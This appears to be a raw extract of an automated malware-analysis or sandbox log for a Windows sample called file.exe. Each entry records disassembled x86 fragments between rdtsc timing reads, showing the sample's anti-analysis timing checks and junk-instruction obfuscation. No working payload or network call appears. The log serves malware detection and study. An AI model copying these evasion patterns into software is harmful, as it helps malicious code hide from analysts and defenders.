Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91497 second address: E91527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C99233272h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F8C99233278h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F8C99233268h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+1248256Ch], edi 0x00000033 mov ebx, 714BAD10h 0x00000038 push 00000000h 0x0000003a add dword ptr [ebp+12455368h], ecx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F8C99233268h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8F66E second address: E8F67D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E906BA second address: E9073A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F8C9923326Ch 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D2A7Ch] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov dword ptr [ebp+12454BD2h], ebx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b or bh, FFFFFFA5h 0x0000002e mov eax, dword ptr [ebp+122D0269h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F8C99233268h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 sub edi, 65BA5FA0h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a jmp 00007F8C99233278h 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E94588 second address: E945B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C98BA52BCh 0x00000009 jmp 00007F8C98BA52C4h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96BBC second address: E96BC6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C9923326Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E94DC5 second address: E94DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F8C98BA52C9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95CCF second address: E95CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96CD0 second address: E96CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CB7 second address: E98CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E94DEC second address: E94DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E999FD second address: E99A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95CD3 second address: E95CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F8C98BA52C0h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CBB second address: E98CC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C99233266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E96CE8 second address: E96CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jc 00007F8C98BA52C0h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CC5 second address: E98CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99AB5 second address: E99AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C98BA52C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CCB second address: E98CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99AD3 second address: E99AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C98BA52BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CCF second address: E98CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98CD3 second address: E98CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F8C98BA52B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99C2C second address: E99C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99C30 second address: E99C3A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99C3A second address: E99C59 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C99233275h 0x00000008 jmp 00007F8C9923326Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99C59 second address: E99C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E99C60 second address: E99C65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F985 second address: E9F99F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C98BA52C4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E43850 second address: E43855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4923 second address: EA4928 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA85F3 second address: EA8613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8C99233279h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8613 second address: EA8618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8618 second address: EA863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F8C99233278h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAE4B5 second address: EAE4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F8C98BA52BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C98BA52C7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAE4E7 second address: EAE4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF13F second address: EAF144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF224 second address: EAF246 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8C99233268h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C99233270h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF246 second address: EAF27B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C98BA52CBh 0x00000008 jmp 00007F8C98BA52C5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF38F second address: EAF3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C99233279h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF3C3 second address: EAF3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF3C7 second address: EAF401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jne 00007F8C99233266h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 je 00007F8C99233268h 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F8C99233275h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF401 second address: EAF416 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C98BA52B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF4F6 second address: EAF54C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233275h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C9923326Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jl 00007F8C9923326Ch 0x0000001a jne 00007F8C99233266h 0x00000020 jmp 00007F8C99233279h 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push esi 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAF54C second address: CCF7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b jng 00007F8C98BA52B8h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 pushad 0x00000016 sub cl, FFFFFF91h 0x00000019 push esi 0x0000001a sub ax, 4C25h 0x0000001f pop ebx 0x00000020 popad 0x00000021 push dword ptr [ebp+122D1721h] 0x00000027 stc 0x00000028 call dword ptr [ebp+122D2F1Dh] 0x0000002e pushad 0x0000002f jmp 00007F8C98BA52BAh 0x00000034 xor eax, eax 0x00000036 jmp 00007F8C98BA52C1h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f jmp 00007F8C98BA52BFh 0x00000044 mov dword ptr [ebp+122D281Ch], eax 0x0000004a jns 00007F8C98BA52C9h 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D2FE7h], edi 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f je 00007F8C98BA52CCh 0x00000065 jmp 00007F8C98BA52C6h 0x0000006a lodsw 0x0000006c jmp 00007F8C98BA52C1h 0x00000071 mov dword ptr [ebp+122D2FE7h], ebx 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b add dword ptr [ebp+122D2BA2h], esi 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 cld 0x00000086 jnl 00007F8C98BA52CBh 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 jo 00007F8C98BA52B6h 0x00000097 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4EBB second address: EB4EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4EC2 second address: EB4ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8C98BA52B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4ECE second address: EB4ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4ED2 second address: EB4EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4311 second address: EB431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C99233266h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB431F second address: EB4327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4799 second address: EB479F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB48C1 second address: EB48CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA6C9 second address: EBA6CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA6CF second address: EBA6F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BFh 0x00000007 jns 00007F8C98BA52BEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA6F8 second address: EBA6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA6FC second address: EBA700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA700 second address: EBA716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C99233270h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA716 second address: EBA71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA71C second address: EBA720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9561 second address: EB957A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8C98BA52C1h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB96D7 second address: EB96EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C99233266h 0x0000000a popad 0x0000000b jl 00007F8C9923326Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9832 second address: EB9836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9836 second address: EB9846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F8C99233266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9846 second address: EB984A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB984A second address: EB9853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9853 second address: EB9859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9966 second address: EB998F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C9923326Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F8C99233268h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F8C9923326Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9C9D second address: EB9CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C98BA52BDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9CAF second address: EB9CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9E01 second address: EB9E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9E07 second address: EB9E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F8C99233266h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9E14 second address: EB9E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F8C98BA52B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9F89 second address: EB9F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E685B1 second address: E685B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E685B5 second address: E685C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E685C1 second address: E685D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C98BA52B6h 0x00000008 jno 00007F8C98BA52B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F8C98BA52BCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBA58D second address: EBA593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC2DA6 second address: EC2DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1A77 second address: EC1A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1BC7 second address: EC1BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1BCF second address: EC1BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F8C9923327Ah 0x0000000d jmp 00007F8C99233272h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1BF4 second address: EC1C02 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1C02 second address: EC1C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1C0C second address: EC1C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F8C98BA52B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC2098 second address: EC20AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C99233266h 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F8C99233266h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC20AB second address: EC20D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F8C98BA52C8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC2207 second address: EC2226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8C9923326Ch 0x00000011 jc 00007F8C99233266h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC2226 second address: EC222C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC222C second address: EC2230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
